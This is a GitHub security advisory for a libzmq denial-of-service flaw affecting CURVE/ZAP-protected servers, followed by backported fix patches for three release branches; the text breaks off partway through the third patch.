Skip to content

Denial-of-Service on CURVE/ZAP-protected servers by unauthenticated clients

High
bluca published GHSA-25wp-cf8g-938m Sep 7, 2020

Package

libzmq

Affected versions

<= 4.3.2

Patched versions

4.3.3

Description

Impact

Users who expose public endpoints over the TCP transport are affected, even with CURVE/ZAP enabled: an unauthenticated client can cause a denial of service.

Patches

#3913
#3973

4.3.1
From f9396304075467cab67affca7ee34a3caa7019a6 Mon Sep 17 00:00:00 2001
From: Doron Somech <somdoron@gmail.com>
Date: Wed, 13 May 2020 17:32:06 +0300
Subject: [PATCH] problem: zeromq connects peer before handshake is completed

Solution: delay connecting the peer pipe until the handshake is completed
(cherry picked from commit e7f0090b161ce6344f6bd35009816a925c070b09)

Conflicts:
	src/i_engine.hpp
	src/norm_engine.hpp
	src/pgm_receiver.hpp
	src/pgm_sender.hpp
	src/raw_engine.cpp
	src/session_base.cpp
	src/session_base.hpp
	src/stream_engine_base.cpp
	src/stream_engine_base.hpp
	src/udp_engine.hpp
	src/ws_engine.cpp
	src/zmtp_engine.cpp
---
 src/i_engine.hpp        |  4 ++++
 src/ipc_connecter.cpp   |  2 +-
 src/ipc_listener.cpp    |  2 +-
 src/norm_engine.hpp     |  2 ++
 src/pgm_receiver.hpp    |  1 +
 src/pgm_sender.hpp      |  1 +
 src/session_base.cpp    | 19 +++++++++++++------
 src/session_base.hpp    |  1 +
 src/socks_connecter.cpp |  2 +-
 src/stream_engine.cpp   | 12 ++++++++++--
 src/stream_engine.hpp   |  8 +++++++-
 src/tcp_connecter.cpp   |  2 +-
 src/tcp_listener.cpp    |  2 +-
 src/tipc_connecter.cpp  |  2 +-
 src/tipc_listener.cpp   |  2 +-
 src/udp_engine.hpp      |  2 ++
 16 files changed, 48 insertions(+), 16 deletions(-)

diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index dfbdd265..a12ec6f2 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -40,6 +40,10 @@ struct i_engine
 {
     virtual ~i_engine () {}
 
+    //  Indicates whether the engine has a handshake stage.
+    //  If it does, the engine must call session.engine_ready when the handshake is complete.
+    virtual bool has_handshake_stage () = 0;
+
     //  Plug the engine to the session.
     virtual void plug (zmq::io_thread_t *io_thread_,
                        class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index 579c5042..bc95fc5e 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -127,7 +127,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index fa2222ca..d2316370 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -173,7 +173,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/norm_engine.hpp b/src/norm_engine.hpp
index 733f24fc..86095b65 100644
--- a/src/norm_engine.hpp
+++ b/src/norm_engine.hpp
@@ -28,6 +28,8 @@ class norm_engine_t : public io_object_t, public i_engine
     int init (const char *network_, bool send, bool recv);
     void shutdown ();
 
+    bool has_handshake_stage () { return false; };
+
     //  i_engine interface implementation.
     //  Plug the engine to the session.
     virtual void plug (zmq::io_thread_t *io_thread_,
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index d5eca74d..7edc4c30 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -55,6 +55,7 @@ class pgm_receiver_t : public io_object_t, public i_engine
     int init (bool udp_encapsulation_, const char *network_);
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return false; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     bool restart_input ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index 1eb0b1f1..88b82946 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -54,6 +54,7 @@ class pgm_sender_t : public io_object_t, public i_engine
     int init (bool udp_encapsulation_, const char *network_);
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return false; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     bool restart_input ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index ef7daf95..b627fc82 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -289,7 +289,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (_engine == NULL)) {
-        _pipe->check_read ();
+        if (_pipe)
+            _pipe->check_read ();
         return;
     }
 
@@ -388,7 +389,18 @@ bool zmq::session_base_t::zap_enabled ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!_engine);
+    _engine = engine_;
 
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    _engine->plug (_io_thread, this);
+}
+
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!_pipe && !is_terminating ()) {
         object_t *parents[2] = {this, _socket};
@@ -412,11 +424,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (_socket, pipes[1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!_engine);
-    _engine = engine_;
-    _engine->plug (_io_thread, this);
 }
 
 void zmq::session_base_t::engine_error (
diff --git a/src/session_base.hpp b/src/session_base.hpp
index 002cdf87..b106e43f 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -62,6 +62,7 @@ class session_base_t : public own_t, public io_object_t, public i_pipe_events
     void flush ();
     void rollback ();
     void engine_error (zmq::stream_engine_t::error_reason_t reason_);
+    void engine_ready ();
 
     //  i_pipe_events interface implementation.
     void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/socks_connecter.cpp b/src/socks_connecter.cpp
index ada20726..ca4aba3a 100644
--- a/src/socks_connecter.cpp
+++ b/src/socks_connecter.cpp
@@ -152,7 +152,7 @@ void zmq::socks_connecter_t::in_event ()
             else {
                 //  Create the engine object for this connection.
                 stream_engine_t *engine =
-                  new (std::nothrow) stream_engine_t (_s, options, _endpoint);
+                  new (std::nothrow) stream_engine_t (_s, options, _endpoint, !options.raw_socket);
                 alloc_assert (engine);
 
                 //  Attach the engine to the corresponding session object.
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index 4b13012d..5d372780 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -65,7 +65,8 @@
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_,
                                        const options_t &options_,
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     _s (fd_),
     _handle (static_cast<handle_t> (NULL)),
     _inpos (NULL),
@@ -79,6 +80,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_,
     _greeting_size (v2_greeting_size),
     _greeting_bytes_read (0),
     _session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     _options (options_),
     _endpoint (endpoint_),
     _plugged (false),
@@ -290,9 +292,12 @@ void zmq::stream_engine_t::in_event ()
     zmq_assert (!_io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (_handshaking))
+    if (unlikely (_handshaking)) {
         if (!handshake ())
             return;
+        else if (_mechanism == NULL && _has_handshake_stage)
+            _session->engine_ready ();
+    }
 
     zmq_assert (_decoder);
 
@@ -896,6 +901,9 @@ void zmq::stream_engine_t::mechanism_ready ()
         _has_heartbeat_timer = true;
     }
 
+    if (_has_handshake_stage)
+        _session->engine_ready ();
+
     bool flush_session = false;
 
     if (_options.recv_routing_id) {
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index a8149fd2..05212670 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -70,10 +70,12 @@ class stream_engine_t : public io_object_t, public i_engine
 
     stream_engine_t (fd_t fd_,
                      const options_t &options_,
-                     const std::string &endpoint_);
+                     const std::string &endpoint_,
+                     bool has_handshake_stage_);
     ~stream_engine_t ();
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return _has_handshake_stage; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     bool restart_input ();
@@ -188,6 +190,10 @@ class stream_engine_t : public io_object_t, public i_engine
     //  The session this engine is attached to.
     zmq::session_base_t *_session;
 
+    //  Indicates whether the engine has a handshake stage; if it does, the engine must call
+    //  session.engine_ready when the handshake is completed.
+    bool _has_handshake_stage;
+
     const options_t _options;
 
     // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index b55d87fc..e8f1b573 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -155,7 +155,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, _endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, _endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index 19baaa1d..a64b93a2 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -116,7 +116,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, _endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, _endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/tipc_connecter.cpp b/src/tipc_connecter.cpp
index 168a0d40..b18aafe7 100644
--- a/src/tipc_connecter.cpp
+++ b/src/tipc_connecter.cpp
@@ -129,7 +129,7 @@ void zmq::tipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tipc_listener.cpp b/src/tipc_listener.cpp
index 9c05f765..2cf1f5ca 100644
--- a/src/tipc_listener.cpp
+++ b/src/tipc_listener.cpp
@@ -98,7 +98,7 @@ void zmq::tipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/udp_engine.hpp b/src/udp_engine.hpp
index 9bf5a533..db93e9a6 100644
--- a/src/udp_engine.hpp
+++ b/src/udp_engine.hpp
@@ -22,6 +22,8 @@ class udp_engine_t : public io_object_t, public i_engine
 
     int init (address_t *address_, bool send_, bool recv_);
 
+    bool has_handshake_stage () { return false; };
+
     //  i_engine interface implementation.
     //  Plug the engine to the session.
     void plug (zmq::io_thread_t *io_thread_, class session_base_t *session_);
4.2.5
From 8f6803867ba41359b36c2c88f91c68c7e76f4001 Mon Sep 17 00:00:00 2001
From: Doron Somech <somdoron@gmail.com>
Date: Wed, 13 May 2020 17:32:06 +0300
Subject: [PATCH] problem: zeromq connects peer before handshake is completed

Solution: delay connecting the peer pipe until the handshake is completed
(cherry picked from commit e7f0090b161ce6344f6bd35009816a925c070b09)

Conflicts:
	src/i_engine.hpp
	src/norm_engine.hpp
	src/pgm_receiver.hpp
	src/pgm_sender.hpp
	src/raw_engine.cpp
	src/session_base.cpp
	src/session_base.hpp
	src/stream_engine_base.cpp
	src/stream_engine_base.hpp
	src/udp_engine.hpp
	src/ws_engine.cpp
	src/zmtp_engine.cpp
---
 src/i_engine.hpp        |  4 ++++
 src/ipc_connecter.cpp   |  2 +-
 src/ipc_listener.cpp    |  2 +-
 src/norm_engine.hpp     |  2 ++
 src/pgm_receiver.hpp    |  1 +
 src/pgm_sender.hpp      |  1 +
 src/session_base.cpp    | 19 +++++++++++++------
 src/session_base.hpp    |  1 +
 src/socks_connecter.cpp |  2 +-
 src/stream_engine.cpp   | 12 ++++++++++--
 src/stream_engine.hpp   |  8 +++++++-
 src/tcp_connecter.cpp   |  2 +-
 src/tcp_listener.cpp    |  2 +-
 src/tipc_connecter.cpp  |  2 +-
 src/tipc_listener.cpp   |  2 +-
 src/udp_engine.hpp      |  2 ++
 16 files changed, 48 insertions(+), 16 deletions(-)

diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index 5e610468..55cafb4f 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -40,6 +40,10 @@ struct i_engine
 {
     virtual ~i_engine () {}
 
+    //  Indicates whether the engine has a handshake stage.
+    //  If it does, the engine must call session.engine_ready when the handshake is complete.
+    virtual bool has_handshake_stage () = 0;
+
     //  Plug the engine to the session.
     virtual void plug (zmq::io_thread_t *io_thread_,
                        class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index eaebfe9f..e0adf081 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -127,7 +127,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index 470aef75..be0c6c38 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -174,7 +174,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/norm_engine.hpp b/src/norm_engine.hpp
index c3ce9296..1370edbf 100644
--- a/src/norm_engine.hpp
+++ b/src/norm_engine.hpp
@@ -27,6 +27,8 @@ class norm_engine_t : public io_object_t, public i_engine
     int init (const char *network_, bool send, bool recv);
     void shutdown ();
 
+    bool has_handshake_stage () { return false; };
+
     //  i_engine interface implementation.
     //  Plug the engine to the session.
     virtual void plug (zmq::io_thread_t *io_thread_,
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index d377d8fd..13282bc8 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -55,6 +55,7 @@ class pgm_receiver_t : public io_object_t, public i_engine
     int init (bool udp_encapsulation_, const char *network_);
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return false; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     void restart_input ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index dfc79425..d6882beb 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -54,6 +54,7 @@ class pgm_sender_t : public io_object_t, public i_engine
     int init (bool udp_encapsulation_, const char *network_);
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return false; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     void restart_input ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index dfb2c205..ef3e24e3 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -281,7 +281,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (engine == NULL)) {
-        pipe->check_read ();
+        if (pipe)
+            pipe->check_read ();
         return;
     }
 
@@ -380,7 +381,18 @@ bool zmq::session_base_t::zap_enabled ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!engine);
+    engine = engine_;
 
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    engine->plug (io_thread, this);
+}
+
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!pipe && !is_terminating ()) {
         object_t *parents[2] = {this, socket};
@@ -408,11 +420,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (socket, pipes[1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!engine);
-    engine = engine_;
-    engine->plug (io_thread, this);
 }
 
 void zmq::session_base_t::engine_error (
diff --git a/src/session_base.hpp b/src/session_base.hpp
index ae9f3a71..55845855 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -64,6 +64,7 @@ class session_base_t : public own_t, public io_object_t, public i_pipe_events
     virtual void reset ();
     void flush ();
     void engine_error (zmq::stream_engine_t::error_reason_t reason);
+    void engine_ready ();
 
     //  i_pipe_events interface implementation.
     void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/socks_connecter.cpp b/src/socks_connecter.cpp
index 7dfc8a85..0a53e8b2 100644
--- a/src/socks_connecter.cpp
+++ b/src/socks_connecter.cpp
@@ -152,7 +152,7 @@ void zmq::socks_connecter_t::in_event ()
             else {
                 //  Create the engine object for this connection.
                 stream_engine_t *engine =
-                  new (std::nothrow) stream_engine_t (s, options, endpoint);
+                  new (std::nothrow) stream_engine_t (s, options, endpoint, !options.raw_socket);
                 alloc_assert (engine);
 
                 //  Attach the engine to the corresponding session object.
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index e6455318..5c17b019 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -64,7 +64,8 @@
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_,
                                        const options_t &options_,
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     s (fd_),
     as_server (false),
     handle ((handle_t) NULL),
@@ -79,6 +80,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_,
     greeting_size (v2_greeting_size),
     greeting_bytes_read (0),
     session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     options (options_),
     endpoint (endpoint_),
     plugged (false),
@@ -288,9 +290,12 @@ void zmq::stream_engine_t::in_event ()
     zmq_assert (!io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (handshaking))
+    if (unlikely (handshaking)) {
         if (!handshake ())
             return;
+        else if (mechanism == NULL && _has_handshake_stage)
+            session->engine_ready ();
+    }
 
     zmq_assert (decoder);
 
@@ -826,6 +831,9 @@ void zmq::stream_engine_t::mechanism_ready ()
         has_heartbeat_timer = true;
     }
 
+    if (_has_handshake_stage)
+        session->engine_ready ();
+
     if (options.recv_routing_id) {
         msg_t routing_id;
         mechanism->peer_routing_id (&routing_id);
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index 0b422c25..0ee51a1e 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -70,10 +70,12 @@ class stream_engine_t : public io_object_t, public i_engine
 
     stream_engine_t (fd_t fd_,
                      const options_t &options_,
-                     const std::string &endpoint);
+                     const std::string &endpoint,
+                     bool has_handshake_stage);
     ~stream_engine_t ();
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return _has_handshake_stage; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     void restart_input ();
@@ -178,6 +180,10 @@ class stream_engine_t : public io_object_t, public i_engine
     //  The session this engine is attached to.
     zmq::session_base_t *session;
 
+    //  Indicates whether the engine has a handshake stage; if it does, the engine must call
+    //  session.engine_ready when the handshake is completed.
+    bool _has_handshake_stage;
+
     const options_t options;
 
     // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index 0a2068e9..f3f2ae1c 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -151,7 +151,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index a4e1cbfa..e41ca979 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -116,7 +116,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/tipc_connecter.cpp b/src/tipc_connecter.cpp
index 4f0a2992..0d16fd9f 100644
--- a/src/tipc_connecter.cpp
+++ b/src/tipc_connecter.cpp
@@ -129,7 +129,7 @@ void zmq::tipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tipc_listener.cpp b/src/tipc_listener.cpp
index 9c05f765..2cf1f5ca 100644
--- a/src/tipc_listener.cpp
+++ b/src/tipc_listener.cpp
@@ -98,7 +98,7 @@ void zmq::tipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/udp_engine.hpp b/src/udp_engine.hpp
index 1a02c524..4f97474a 100644
--- a/src/udp_engine.hpp
+++ b/src/udp_engine.hpp
@@ -23,6 +23,8 @@ class udp_engine_t : public io_object_t, public i_engine
 
     int init (address_t *address_, bool send_, bool recv_);
 
+    bool has_handshake_stage () { return false; };
+
     //  i_engine interface implementation.
     //  Plug the engine to the session.
     void plug (zmq::io_thread_t *io_thread_, class session_base_t *session_);
4.2.1
From 6557497b7095399424fe24e83bd936a3d54d4175 Mon Sep 17 00:00:00 2001
From: Doron Somech <somdoron@gmail.com>
Date: Wed, 13 May 2020 17:32:06 +0300
Subject: [PATCH] problem: zeromq connects peer before handshake is completed

Solution: delay connecting the peer pipe until the handshake is completed
(cherry picked from commit e7f0090b161ce6344f6bd35009816a925c070b09)

Conflicts:
	src/i_engine.hpp
	src/norm_engine.hpp
	src/pgm_receiver.hpp
	src/pgm_sender.hpp
	src/raw_engine.cpp
	src/session_base.cpp
	src/session_base.hpp
	src/stream_engine_base.cpp
	src/stream_engine_base.hpp
	src/udp_engine.hpp
	src/ws_engine.cpp
	src/zmtp_engine.cpp
---
 src/i_engine.hpp        |  4 ++++
 src/ipc_connecter.cpp   |  2 +-
 src/ipc_listener.cpp    |  2 +-
 src/norm_engine.hpp     |  2 ++
 src/pgm_receiver.hpp    |  1 +
 src/pgm_sender.hpp      |  1 +
 src/session_base.cpp    | 19 +++++++++++++------
 src/session_base.hpp    |  1 +
 src/socks_connecter.cpp |  2 +-
 src/stream_engine.cpp   | 12 ++++++++++--
 src/stream_engine.hpp   |  8 +++++++-
 src/tcp_connecter.cpp   |  2 +-
 src/tcp_listener.cpp    |  2 +-
 src/tipc_connecter.cpp  |  2 +-
 src/tipc_listener.cpp   |  2 +-
 src/udp_engine.hpp      |  2 ++
 16 files changed, 48 insertions(+), 16 deletions(-)

diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index 506ff8c7..1fb13f0b 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -41,6 +41,10 @@ namespace zmq
     {
         virtual ~i_engine () {}
 
+        //  Indicates whether the engine has a handshake stage.
+        //  If it does, the engine must call session.engine_ready when the handshake is complete.
+        virtual bool has_handshake_stage () = 0;
+
         //  Plug the engine to the session.
         virtual void plug (zmq::io_thread_t *io_thread_,
             class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index 48793e8c..9fd47a04 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -123,7 +123,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index 62b75c66..0b81c689 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -172,7 +172,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/norm_engine.hpp b/src/norm_engine.hpp
index 5d059ec7..a749e758 100644
--- a/src/norm_engine.hpp
+++ b/src/norm_engine.hpp
@@ -27,6 +27,8 @@ namespace zmq
             int init(const char* network_, bool send, bool recv);
             void shutdown();
 
+            bool has_handshake_stage () { return false; };
+
             //  i_engine interface implementation.
             //  Plug the engine to the session.
             virtual void plug (zmq::io_thread_t *io_thread_,
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index 52251b15..e91c0f06 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -58,6 +58,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index de1c72e2..51f6f88c 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -57,6 +57,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index 7ce1a2d6..99900045 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -278,7 +278,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (engine == NULL)) {
-        pipe->check_read ();
+        if (pipe)
+            pipe->check_read ();
         return;
     }
 
@@ -375,7 +376,18 @@ bool zmq::session_base_t::zap_enabled ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!engine);
+    engine = engine_;
 
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    engine->plug (io_thread, this);
+}
+
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!pipe && !is_terminating ()) {
         object_t *parents [2] = {this, socket};
@@ -404,11 +416,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (socket, pipes [1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!engine);
-    engine = engine_;
-    engine->plug (io_thread, this);
 }
 
 void zmq::session_base_t::engine_error (
diff --git a/src/session_base.hpp b/src/session_base.hpp
index c1071767..2bccbd08 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -67,6 +67,7 @@ namespace zmq
         virtual void reset ();
         void flush ();
         void engine_error (zmq::stream_engine_t::error_reason_t reason);
+        void engine_ready ();
 
         //  i_pipe_events interface implementation.
         void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/socks_connecter.cpp b/src/socks_connecter.cpp
index e56eb6ed..1d34d2dd 100644
--- a/src/socks_connecter.cpp
+++ b/src/socks_connecter.cpp
@@ -151,7 +151,7 @@ void zmq::socks_connecter_t::in_event ()
             else {
                 //  Create the engine object for this connection.
                 stream_engine_t *engine = new (std::nothrow)
-                    stream_engine_t (s, options, endpoint);
+                    stream_engine_t (s, options, endpoint, !options.raw_socket);
                 alloc_assert (engine);
 
                 //  Attach the engine to the corresponding session object.
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index 920d5956..bb886513 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -63,7 +63,8 @@
 #include "wire.hpp"
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     s (fd_),
     as_server(false),
     handle((handle_t)NULL),
@@ -78,6 +79,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
